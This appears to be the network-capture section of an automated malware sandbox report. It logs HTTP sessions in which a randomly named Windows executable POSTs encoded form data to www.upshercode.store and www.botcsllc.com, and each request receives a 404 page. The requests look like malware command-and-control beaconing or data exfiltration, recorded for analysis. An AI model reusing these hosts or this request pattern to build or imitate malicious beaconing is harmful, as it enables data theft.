1 | 192.168.2.6 | 49706 | 162.240.81.18 | 80 | 3152 | C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe
Timestamp | Bytes transferred | Direction | Data
May 23, 2024 15:19:05.833611965 CEST | 754 | OUT | POST /x98j/ HTTP/1.1
Host: www.upshercode.store
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
Content-Length: 209
Cache-Control: max-age=0
Connection: close
Content-Type: application/x-www-form-urlencoded
Origin: http://www.upshercode.store
Referer: http://www.upshercode.store/x98j/
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Data Ascii: FNPd=nhZ5J1hcIHrKYcnCidsSlPN1hFnd94oWYTq4xX/x4UZCko/78mr3Io+Vscn5bbFiTCw98T9gU4xUB+E7yqM4QVsJMvbt+0E5ynIw8cCQ5hwocnka9SSAkjnETwV2zRwOMGgWAcs5Q3tj8aM+xZn5LoRJxgAlXaGE1MY4bVqMnSrICFA4Wr34grm9wKBDkwhwviU1zNnKrbKB
May 23, 2024 15:19:06.404011011 CEST | 1236 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.20.1
Date: Thu, 23 May 2024 13:19:06 GMT
Content-Type: text/html
Content-Length: 3650
Connection: close
ETag: "636d2d22-e42"
Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #294172; color: #fff; font-weight: norm [TRUNCATED]
May 23, 2024 15:19:06.405716896 CEST | 1236 | IN |
Data Ascii: border-bottom: 2px solid #000; } h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; background-color:
May 23, 2024 15:19:06.410917997 CEST | 1236 | IN |
Data Ascii: <h1><strong>nginx error!</strong></h1> <div class="content"> <h3>The page you are looking for is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="
May 23, 2024 15:19:06.410933971 CEST | 115 | IN |
Data Ascii: Fedora ]" width="88" height="31" /></a> </div> </div> </body></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  2192.168.2.649707162.240.81.18803152C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe
                                  TimestampBytes transferredDirectionData
                                  May 23, 2024 15:19:08.371110916 CEST778OUTPOST /x98j/ HTTP/1.1
                                  Host: www.upshercode.store
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-US,en;q=0.9
                                  Accept-Encoding: gzip, deflate, br
                                  Content-Length: 233
                                  Cache-Control: max-age=0
                                  Connection: close
                                  Content-Type: application/x-www-form-urlencoded
                                  Origin: http://www.upshercode.store
                                  Referer: http://www.upshercode.store/x98j/
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                  Data Ascii: FNPd=nhZ5J1hcIHrKY8XCg+USp/NqulndoIpfYTu4xSfh4mNCqtD79nr3Lo+Vj8myV7FpTC9A8WVgU8ZUB6I7ybM7RFsxHPbjwUE5ynIw8cWp5iAocXUavm+DtDnFQwV23RwKMGg4AdwTQxpj8Yk+yInmFYQA/ABxGaqPs/tFFUe0xxTyHzBiKY3by7G/wIZxkQhatis1hartkvvil64XFfgkQL2Svkj7olcc9A==
                                  May 23, 2024 15:19:08.944555044 CEST | 1236 bytes | IN | HTTP/1.1 404 Not Found
                                  Server: nginx/1.20.1
                                  Date: Thu, 23 May 2024 13:19:08 GMT
                                  Content-Type: text/html
                                  Content-Length: 3650
                                  Connection: close
                                  ETag: "636d2d22-e42"
                                  Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #294172; color: #fff; font-weight: norm [TRUNCATED]
                                  May 23, 2024 15:19:08.945955038 CEST | 1236 bytes | IN
                                  Data Ascii: border-bottom: 2px solid #000; } h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; background-color:
                                  May 23, 2024 15:19:08.949326038 CEST | 1236 bytes | IN
                                  Data Ascii: <h1><strong>nginx error!</strong></h1> <div class="content"> <h3>The page you are looking for is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="
                                  May 23, 2024 15:19:08.949333906 CEST | 115 bytes | IN
                                  Data Ascii: Fedora ]" width="88" height="31" /></a> </div> </div> </body></html>


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  3 | 192.168.2.6 | 49708 | 162.240.81.18 | 80 | 3152 | C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  May 23, 2024 15:19:10.900278091 CEST | 1791 bytes | OUT | POST /x98j/ HTTP/1.1
                                  Host: www.upshercode.store
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-US,en;q=0.9
                                  Accept-Encoding: gzip, deflate, br
                                  Content-Length: 1245
                                  Cache-Control: max-age=0
                                  Connection: close
                                  Content-Type: application/x-www-form-urlencoded
                                  Origin: http://www.upshercode.store
                                  Referer: http://www.upshercode.store/x98j/
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                  Data Ascii: FNPd=nhZ5J1hcIHrKY8XCg+USp/NqulndoIpfYTu4xSfh4mVCqf778Ez3Ko+V9smxV7F0TC1E8WZeU6dUAZA7wpo7YFsxIvbi+0FxynYK8cGp5iAocRYasySDvDnETwV6zRwuMG5FAd0pQChj940+iq/mH4QC8AB5GanXs/g6FUqexyPyGFsWa6uMsbKjt79rgVZ3iDMQhJXlmPjbptYOGuolH6yakkC39Wtlh4p39OxK6RZ/RzDGesq8O9Fs1YqSo5MDIc8POfxJh1UvdPgjb2haE0FTed68E3zlb3LqZCHSligpraBsdAy9Fps0IhbVBx7RlQxvgM1xC8bHfdDpcoN0z4RgCRZy1C8foQq+0o2eVhIlf5ikKrDs1eJx/gfOm7SqWZtsck7JVxG25SogIvgWg7JUEgHXJWQCbtwwErvtmHhzGApXHd9VHiLsu4Wre83f+KvcHit7MebQ+Bc/Alo2HbX64qyQPc+m2jQFqyMcR8IviQbqB0Z4Iu11b1iW/fLS1CdkptIp3CgCRqZv4HWAUh4pxl3hfAXtAZCgrlBdJs9TVD5FctgsuPGcLnQZfClsrSS3VdvjRyp9GYq3ZXIE73+SQD5vAB2ggkeuX2Ov4Mu0SU8IDz9HJXpAq8LxgAXPO06ZQ4EwzKt2kiNlUwIwj1FygeafuTHNzrFLkmJQpvIr9Gk2zl4pGgPSQB80mekQ7LO/5htOSBA06AcTKMrBXCB4T3iqjSkI4pNobHQ6X/yPsRD32CVJsg/5yA7wMFPdiI4KzBYe19mvzNcN6dHIiQQyVZD3XgMNssmcbI59Iqqs1F7AMczw21XQZfYIJl4d+2IIhQtLknBS2zEv/htz1BEQhWeX2krN7a40bOWJqWSTkA/GmNtUASGkPs1/geW/jEzuwOs2gEiNJFsSTX3MBnfA/2EdRbO4XtyEeTdC41tOlZJKTbp7cir0QKcEVHous5N/Gfwik9V2RrCgjNgHzNzgVNlHmt4SGFQ6Ysepzd4iW2b [TRUNCATED]
                                  May 23, 2024 15:19:11.487282991 CEST | 1236 bytes | IN | HTTP/1.1 404 Not Found
                                  Server: nginx/1.20.1
                                  Date: Thu, 23 May 2024 13:19:11 GMT
                                  Content-Type: text/html
                                  Content-Length: 3650
                                  Connection: close
                                  ETag: "636d2d22-e42"
                                  Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #294172; color: #fff; font-weight: norm [TRUNCATED]
                                  May 23, 2024 15:19:11.488650084 CEST | 1236 bytes | IN
                                  Data Ascii: border-bottom: 2px solid #000; } h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; background-color:
                                  May 23, 2024 15:19:11.492068052 CEST | 1236 bytes | IN
                                  Data Ascii: <h1><strong>nginx error!</strong></h1> <div class="content"> <h3>The page you are looking for is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="
                                  May 23, 2024 15:19:11.492082119 CEST | 115 bytes | IN
                                  Data Ascii: Fedora ]" width="88" height="31" /></a> </div> </div> </body></html>


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  4 | 192.168.2.6 | 49709 | 162.240.81.18 | 80 | 3152 | C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  May 23, 2024 15:19:13.744543076 CEST | 495 bytes | OUT | GET /x98j/?FNPd=qjxZKFsELly6MM+AmuUyu+F9rQiXp5lDW0qCpVrbxnhhuort7QqFJtzXrMzOc4R6Q1I+kDBccd8ZIbwb2K8nQH4tZ93h2GRHyGwno8v69jYjSXEAvgOChTSVAihV0isdDVgpDYw=&zdK0d=M8mTZ0xHNd1dPVm HTTP/1.1
                                  Host: www.upshercode.store
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-US,en;q=0.9
                                  Connection: close
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                  May 23, 2024 15:19:14.310803890 CEST | 1236 bytes | IN | HTTP/1.1 404 Not Found
                                  Server: nginx/1.20.1
                                  Date: Thu, 23 May 2024 13:19:14 GMT
                                  Content-Type: text/html
                                  Content-Length: 3650
                                  Connection: close
                                  ETag: "636d2d22-e42"
                                  Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #294172; color: #fff; font-weight: norm [TRUNCATED]
                                  May 23, 2024 15:19:14.311640024 CEST | 1236 bytes | IN
                                  Data Ascii: border-bottom: 2px solid #000; } h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; background-color:
                                  May 23, 2024 15:19:14.318681002 CEST | 1236 bytes | IN
                                  Data Ascii: <h1><strong>nginx error!</strong></h1> <div class="content"> <h3>The page you are looking for is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="
                                  May 23, 2024 15:19:14.318696976 CEST | 115 bytes | IN
                                  Data Ascii: Fedora ]" width="88" height="31" /></a> </div> </div> </body></html>


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  5 | 192.168.2.6 | 49711 | 216.40.34.41 | 80 | 3152 | C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  May 23, 2024 15:19:19.632072926 CEST | 742 bytes | OUT | POST /qukz/ HTTP/1.1
                                  Host: www.botcsllc.com
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-US,en;q=0.9
                                  Accept-Encoding: gzip, deflate, br
                                  Content-Length: 209
                                  Cache-Control: max-age=0
                                  Connection: close
                                  Content-Type: application/x-www-form-urlencoded
                                  Origin: http://www.botcsllc.com
                                  Referer: http://www.botcsllc.com/qukz/
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                  Data Ascii: FNPd=7hUavJER2vW+qhQvBlXQTQSVGLou+zwR8qsK7w150L5wZr9wc/uJ/Es4aw+1OvWeA366OIdpzm7ogp1nqB2kopnuXBPDb82S20GgSCiJnDj3p6nywzb3J3zfv6+ho9D1L32h8VOZP0sn03mzaIIANpHgYM7vHrnPi79hDSys3gHZI7TIWV0HJyG5aXvjRQKIWkZWucDcUYH6
                                  May 23, 2024 15:19:20.166640043 CEST | 1236 bytes | IN | HTTP/1.1 404 Not Found
                                  content-type: text/html; charset=UTF-8
                                  x-request-id: 102edd6b-9466-4f7e-8804-87a87faaa0c4
                                  x-runtime: 0.025563
                                  content-length: 18245
                                  connection: close
                                  Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <title>Action Controller: Exception caught</title> <style> body { background-color: #FAFAFA; color: #333; margin: 0px; } body, p, ol, ul, td { font-family: helvetica, verdana, arial, sans-serif; font-size: 13px; line-height: 18px; } pre { font-size: 11px; white-space: pre-wrap; } pre.box { border: 1px solid #EEE; padding: 10px; margin: 0px; width: 958px; } header { color: #F0F0F0; background: #C52F24; padding: 0.5em 1.5em; } h1 { margin: 0.2em 0; line-height: 1.1em; font-size: 2em; } h2 { color: #C52F24; line-height: 25px; } .details { border: 1px solid #D0D0D0; border-radius: 4px; margin: 1em 0px; display: block; width: 978px; } .summary { padding: 8px 15px; border-bottom: 1px solid #D0D0D0; [TRUNCATED]
                                  May 23, 2024 15:19:20.167527914 CEST | 1236 bytes | IN
                                  Data Ascii: pre { margin: 5px; border: none; } #container { box-sizing: border-box; width: 100%; padding: 0 1.5em; } .source * { margin: 0px; padding: 0px; } .source { border: 1px
                                  May 23, 2024 15:19:20.172131062 CEST | 1236 bytes | IN
                                  Data Ascii: } #route_table thead tr.bottom { border-bottom: none; } #route_table thead tr.bottom th { padding: 10px 0; line-height: 15px; } #route_table thead tr.bottom th input#search { -webkit-appearance: textfield; }
                                  May 23, 2024 15:19:20.176995039 CEST | 1236 bytes | IN
                                  Data Ascii: var toggleSessionDump = function() { return toggle('session_dump'); } var toggleEnvDump = function() { return toggle('env_dump'); } </script></head><body><header> <h1>Routing Error</h1></header><div id="c
                                  May 23, 2024 15:19:20.177005053 CEST | 1236 bytes | IN
                                  Data Ascii: ion_dispatch/middleware/show_exceptions.rb:33:in `call&#39;</a><br><a class="trace-frames" data-frame-id="2" href="#">lograge (0.11.2) lib/lograge/rails_ext/rack/logger.rb:15:in `call_app&#39;</a><br><a class="trace-frames" data-frame-id="3" h
                                  May 23, 2024 15:19:20.187411070 CEST | 1060 bytes | IN
                                  Data Ascii: _id.rb:27:in `call&#39;</a><br><a class="trace-frames" data-frame-id="11" href="#">rack (2.2.3) lib/rack/method_override.rb:24:in `call&#39;</a><br><a class="trace-frames" data-frame-id="12" href="#">rack (2.2.3) lib/rack/runtime.rb:22:in `cal
                                  May 23, 2024 15:19:20.190502882 CEST | 1236 bytes | IN
                                  Data Ascii: frame-id="19" href="#">puma (4.3.9) lib/puma/server.rb:718:in `handle_request&#39;</a><br><a class="trace-frames" data-frame-id="20" href="#">puma (4.3.9) lib/puma/server.rb:472:in `process_client&#39;</a><br><a class="trace-frames" data-frame
                                  May 23, 2024 15:19:20.190517902 CEST | 1236 bytes | IN
                                  Data Ascii: ><br><a class="trace-frames" data-frame-id="5" href="#">activesupport (5.2.6) lib/active_support/tagged_logging.rb:28:in `tagged&#39;</a><br><a class="trace-frames" data-frame-id="6" href="#">activesupport (5.2.6) lib/active_support/tagged_log
                                  May 23, 2024 15:19:20.198250055 CEST | 1236 bytes | IN
                                  Data Ascii: >actionpack (5.2.6) lib/action_dispatch/middleware/executor.rb:14:in `call&#39;</a><br><a class="trace-frames" data-frame-id="15" href="#">actionpack (5.2.6) lib/action_dispatch/middleware/static.rb:127:in `call&#39;</a><br><a class="trace-fra
                                  May 23, 2024 15:19:20.198261023 CEST | 1236 bytes | IN
                                  Data Ascii: mentById('frame-source-0'); // Add click listeners for all stack frames for (var i = 0; i < traceFrames.length; i++) { traceFrames[i].addEventListener('click', function(e) { e.preventDefault(); var target = e.tar
                                  May 23, 2024 15:19:20.198292971 CEST | 848 bytes | IN
                                  Data Ascii: <th> <a data-route-helper="_path" title="Returns a relative path (without the http or domain)" href="#">Path</a> / <a data-route-helper="_url" title="Returns an absolute URL (with the http and domain)" href="#">Url</a> </


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  6 | 192.168.2.6 | 49712 | 216.40.34.41 | 80 | 3152 | C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  May 23, 2024 15:19:22.165946007 CEST | 766 bytes | OUT | POST /qukz/ HTTP/1.1
                                  Host: www.botcsllc.com
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-US,en;q=0.9
                                  Accept-Encoding: gzip, deflate, br
                                  Content-Length: 233
                                  Cache-Control: max-age=0
                                  Connection: close
                                  Content-Type: application/x-www-form-urlencoded
                                  Origin: http://www.botcsllc.com
                                  Referer: http://www.botcsllc.com/qukz/
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                  Data Ascii: FNPd=7hUavJER2vW+rBAvSyrQRwSWJrou0TwN8qQK7yZQ0dpwZJlwOraJ6Es4SQ+wWPXQA2HHOKZpziTogoFnqyejo5mIahPBVc2S20GgSCejnHH3pK3yxSb0XnzA/q+h/tDxL32X8QqzPyon0zizbZIDEpHccM6+BYeCu4M5MhifjXPgNNSSKm0kbim7aV3RRwKiUkhW8LP7bsiZUt3K5ZOuQP43G/xxbsQEyw==
                                  May 23, 2024 15:19:22.705976963 CEST | 1236 bytes | IN | HTTP/1.1 404 Not Found
                                  content-type: text/html; charset=UTF-8
                                  x-request-id: cb9f6b69-dc63-4e2d-be7d-c6acb065fe0a
                                  x-runtime: 0.051811
                                  content-length: 18269
                                  connection: close
                                  Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <title>Action Controller: Exception caught</title> <style> body { background-color: #FAFAFA; color: #333; margin: 0px; } body, p, ol, ul, td { font-family: helvetica, verdana, arial, sans-serif; font-size: 13px; line-height: 18px; } pre { font-size: 11px; white-space: pre-wrap; } pre.box { border: 1px solid #EEE; padding: 10px; margin: 0px; width: 958px; } header { color: #F0F0F0; background: #C52F24; padding: 0.5em 1.5em; } h1 { margin: 0.2em 0; line-height: 1.1em; font-size: 2em; } h2 { color: #C52F24; line-height: 25px; } .details { border: 1px solid #D0D0D0; border-radius: 4px; margin: 1em 0px; display: block; width: 978px; } .summary { padding: 8px 15px; border-bottom: 1px solid #D0D0D0; [TRUNCATED]
                                  May 23, 2024 15:19:22.706659079 CEST | 1236 | IN | Data Raw: 70 72 65 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 35 70 78 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 62 6f 78 2d 73 69 7a
                                  Data Ascii: pre { margin: 5px; border: none; } #container { box-sizing: border-box; width: 100%; padding: 0 1.5em; } .source * { margin: 0px; padding: 0px; } .source { border: 1px
                                  May 23, 2024 15:19:22.708333969 CEST | 448 | IN | Data Raw: 0a 20 20 7d 0a 0a 20 20 23 72 6f 75 74 65 5f 74 61 62 6c 65 20 74 68 65 61 64 20 74 72 2e 62 6f 74 74 6f 6d 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 23 72 6f 75 74 65 5f 74 61 62 6c
                                  Data Ascii: } #route_table thead tr.bottom { border-bottom: none; } #route_table thead tr.bottom th { padding: 10px 0; line-height: 15px; } #route_table thead tr.bottom th input#search { -webkit-appearance: textfield; }
                                  May 23, 2024 15:19:22.710387945 CEST | 1236 | IN | Data Raw: 65 73 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 4c 69 67 68 74 47 6f 6c 64 65 6e 52 6f 64 59 65 6c 6c 6f 77 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 32 70 78 20 53 6c 61 74
                                  Data Ascii: es { background-color: LightGoldenRodYellow; border-bottom: solid 2px SlateGrey; } #route_table tbody.exact_matches tr, #route_table tbody.fuzzy_matches tr { background: none; border-bottom: none; } #route_table td
                                  May 23, 2024 15:19:22.710396051 CEST | 224 | IN | Data Raw: 54 72 61 63 65 26 23 33 39 3b 29 3b 73 68 6f 77 28 26 23 33 39 3b 41 70 70 6c 69 63 61 74 69 6f 6e 2d 54 72 61 63 65 26 23 33 39 3b 29 3b 3b 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 3e 41 70 70 6c 69 63 61 74 69 6f 6e 20 54 72 61 63 65 3c 2f
                                  Data Ascii: Trace&#39;);show(&#39;Application-Trace&#39;);; return false;">Application Trace</a> | <a href="#" onclick="hide(&#39;Application-Trace&#39;);hide(&#39;Full-Trace&#39;);show(&#39;Framework-Trace&#39;);; return false;">Fr
                                  May 23, 2024 15:19:22.711849928 CEST | 1236 | IN | Data Raw: 61 6d 65 77 6f 72 6b 20 54 72 61 63 65 3c 2f 61 3e 20 7c 0a 20 20 20 20 3c 61 20 68 72 65 66 3d 22 23 22 20 6f 6e 63 6c 69 63 6b 3d 22 68 69 64 65 28 26 23 33 39 3b 41 70 70 6c 69 63 61 74 69 6f 6e 2d 54 72 61 63 65 26 23 33 39 3b 29 3b 68 69 64
                                  Data Ascii: amework Trace</a> | <a href="#" onclick="hide(&#39;Application-Trace&#39;);hide(&#39;Framework-Trace&#39;);show(&#39;Full-Trace&#39;);; return false;">Full Trace</a> <div id="Application-Trace" style="display: block;"> <pre><co
                                  May 23, 2024 15:19:22.711857080 CEST | 1236 | IN | Data Raw: 28 35 2e 32 2e 36 29 20 6c 69 62 2f 61 63 74 69 76 65 5f 73 75 70 70 6f 72 74 2f 74 61 67 67 65 64 5f 6c 6f 67 67 69 6e 67 2e 72 62 3a 37 31 3a 69 6e 20 60 74 61 67 67 65 64 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74
                                  Data Ascii: (5.2.6) lib/active_support/tagged_logging.rb:71:in `tagged&#39;</a><br><a class="trace-frames" data-frame-id="7" href="#">railties (5.2.6) lib/rails/rack/logger.rb:26:in `call&#39;</a><br><a class="trace-frames" data-frame-id="8" href="#">acti
                                  May 23, 2024 15:19:22.715688944 CEST | 1236 | IN | Data Raw: 60 63 61 6c 6c 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 31 36 22 20 68 72 65 66 3d 22 23 22 3e 72 61 63 6b 20 28 32 2e 32 2e 33 29
                                  Data Ascii: `call&#39;</a><br><a class="trace-frames" data-frame-id="16" href="#">rack (2.2.3) lib/rack/sendfile.rb:110:in `call&#39;</a><br><a class="trace-frames" data-frame-id="17" href="#">railties (5.2.6) lib/rails/user.rb:524:in `call&#39;</a><br>
                                  May 23, 2024 15:19:22.715703011 CEST | 1236 | IN | Data Raw: 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 32 22 20 68 72 65 66 3d 22 23 22 3e 6c 6f 67 72 61 67 65 20 28 30 2e 31 31 2e 32 29 20 6c 69 62 2f 6c 6f 67 72 61 67 65 2f 72 61 69 6c 73 5f 65 78 74 2f 72 61 63
                                  Data Ascii: race-frames" data-frame-id="2" href="#">lograge (0.11.2) lib/lograge/rails_ext/rack/logger.rb:15:in `call_app&#39;</a><br><a class="trace-frames" data-frame-id="3" href="#">railties (5.2.6) lib/rails/rack/logger.rb:26:in `block in call&#39;</a
                                  May 23, 2024 15:19:22.717035055 CEST | 1236 | IN | Data Raw: 3d 22 23 22 3e 72 61 63 6b 20 28 32 2e 32 2e 33 29 20 6c 69 62 2f 72 61 63 6b 2f 6d 65 74 68 6f 64 5f 6f 76 65 72 72 69 64 65 2e 72 62 3a 32 34 3a 69 6e 20 60 63 61 6c 6c 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72
                                  Data Ascii: ="#">rack (2.2.3) lib/rack/method_override.rb:24:in `call&#39;</a><br><a class="trace-frames" data-frame-id="12" href="#">rack (2.2.3) lib/rack/runtime.rb:22:in `call&#39;</a><br><a class="trace-frames" data-frame-id="13" href="#">activesuppor
                                  May 23, 2024 15:19:22.717041969 CEST | 1236 | IN | Data Raw: 65 66 3d 22 23 22 3e 70 75 6d 61 20 28 34 2e 33 2e 39 29 20 6c 69 62 2f 70 75 6d 61 2f 73 65 72 76 65 72 2e 72 62 3a 33 32 38 3a 69 6e 20 60 62 6c 6f 63 6b 20 69 6e 20 72 75 6e 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22
                                  Data Ascii: ef="#">puma (4.3.9) lib/puma/server.rb:328:in `block in run&#39;</a><br><a class="trace-frames" data-frame-id="22" href="#">puma (4.3.9) lib/puma/thread_pool.rb:134:in `block in spawn_thread&#39;</a><br></code></pre> </div> <script type


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  7 | 192.168.2.6 | 49713 | 216.40.34.41 | 80 | 3152 | C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  May 23, 2024 15:19:24.696022987 CEST | 1779 | OUT | POST /qukz/ HTTP/1.1
                                  Host: www.botcsllc.com
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-US,en;q=0.9
                                  Accept-Encoding: gzip, deflate, br
                                  Content-Length: 1245
                                  Cache-Control: max-age=0
                                  Connection: close
                                  Content-Type: application/x-www-form-urlencoded
                                  Origin: http://www.botcsllc.com
                                  Referer: http://www.botcsllc.com/qukz/
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
